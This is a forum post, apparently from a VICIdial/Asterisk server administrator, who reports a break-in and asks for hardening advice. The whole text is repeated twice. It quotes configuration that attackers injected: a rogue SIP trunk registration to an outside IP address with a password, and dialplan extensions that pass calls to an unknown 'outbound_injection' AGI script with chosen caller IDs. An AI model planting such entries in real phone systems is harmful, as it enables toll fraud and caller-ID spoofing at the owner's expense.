VICIDIAL HACK some file injected
Posted: Thu Mar 09, 2023 3:32 pm
hello,
Recently I have notice some kind of files injected in my vicibox server firstly i have notice my all carrier have been disappears from root when I type
( asterisk -rx"sip show registry") the outcome is
(104.238.131.72:45931 N Endpoint 120 Registered Thu, 09 Mar 2023 15:17:27)
and all my carrier have been disappeared apart from above one.
so I try to fine what is the matter I went to (/etc/asterisk/sip.conf) and Shaw there is a unknow carrier registered like this
register => Endpoint:99ruPP41Q97qsyGT@104.238.131.72:45931
[Endpoint]
type = friend
context = default
host = 104.238.131.72
port = 45931
qualify = no
when I have delete this one and reload the sip the all carriers appeared
I try to find more and found some extra unknow files have been injected in (/etc/asterisk/extensions.conf)
[
; VICIDIAL query
exten => 8397,1,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_outbound_injection-v2.agi,QUERY)
exten => 8397,n,Hangup()
; VICIDIAL direct
exten => _8398*.,1,Set(USER=${CUT(EXTEN,*,2)})
exten => _8398*.,n,Set(DIALCODE=${CUT(EXTEN,*,3)})
exten => _8398*.,n,Set(CALLERID=${CUT(EXTEN,*,4)})
exten => _8398*.,n,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_outbound_injection-v2.agi,RUN_DIRECT-----${USER}-----${DIALCODE}-----${CALLERID})
exten => _8398*.,n,Hangup()
; VICIDIAL campaign
exten => _8399!,1,Set(CAMPAIGN=${CUT(EXTEN,*,2)})
exten => _8399!,n,Set(DIALCODE=${CUT(EXTEN,*,3)})
exten => _8399!,n,Set(CALLERID=${CUT(EXTEN,*,4)})
exten => _8399!,n,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_outbound_injection-v2.agi,RUN-----${CAMPAIGN}-----${DIALCODE}-----${CALLERID})
exten => _8399!,n,Hangup()
]
I have deleted this one and also from directory
but the thing is that how the have entered into my server and how they have injected files
and after removing again same injected file and carrier put by hackers. how to stop them to get into my server
Action done
root password changed
please do let me know any suggestion and how to increase securities
Systems cloud server
VERSION: 2.14-830a
BUILD: 210920-2159
© 2021 ViciDial Group
Asteris version 11.25.1-vici, tried in vicibox 7.0.4,
server Intel(R) Xeon(R) CPU E3-1230 v3 @ 3.30GHz
Recently I have notice some kind of files injected in my vicibox server firstly i have notice my all carrier have been disappears from root when I type
( asterisk -rx"sip show registry") the outcome is
(104.238.131.72:45931 N Endpoint 120 Registered Thu, 09 Mar 2023 15:17:27)
and all my carrier have been disappeared apart from above one.
so I try to fine what is the matter I went to (/etc/asterisk/sip.conf) and Shaw there is a unknow carrier registered like this
register => Endpoint:99ruPP41Q97qsyGT@104.238.131.72:45931
[Endpoint]
type = friend
context = default
host = 104.238.131.72
port = 45931
qualify = no
when I have delete this one and reload the sip the all carriers appeared
I try to find more and found some extra unknow files have been injected in (/etc/asterisk/extensions.conf)
[
; VICIDIAL query
exten => 8397,1,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_outbound_injection-v2.agi,QUERY)
exten => 8397,n,Hangup()
; VICIDIAL direct
exten => _8398*.,1,Set(USER=${CUT(EXTEN,*,2)})
exten => _8398*.,n,Set(DIALCODE=${CUT(EXTEN,*,3)})
exten => _8398*.,n,Set(CALLERID=${CUT(EXTEN,*,4)})
exten => _8398*.,n,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_outbound_injection-v2.agi,RUN_DIRECT-----${USER}-----${DIALCODE}-----${CALLERID})
exten => _8398*.,n,Hangup()
; VICIDIAL campaign
exten => _8399!,1,Set(CAMPAIGN=${CUT(EXTEN,*,2)})
exten => _8399!,n,Set(DIALCODE=${CUT(EXTEN,*,3)})
exten => _8399!,n,Set(CALLERID=${CUT(EXTEN,*,4)})
exten => _8399!,n,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_outbound_injection-v2.agi,RUN-----${CAMPAIGN}-----${DIALCODE}-----${CALLERID})
exten => _8399!,n,Hangup()
]
I have deleted this one and also from directory
but the thing is that how the have entered into my server and how they have injected files
and after removing again same injected file and carrier put by hackers. how to stop them to get into my server
Action done
root password changed
please do let me know any suggestion and how to increase securities
Systems cloud server
VERSION: 2.14-830a
BUILD: 210920-2159
© 2021 ViciDial Group
Asteris version 11.25.1-vici, tried in vicibox 7.0.4,
server Intel(R) Xeon(R) CPU E3-1230 v3 @ 3.30GHz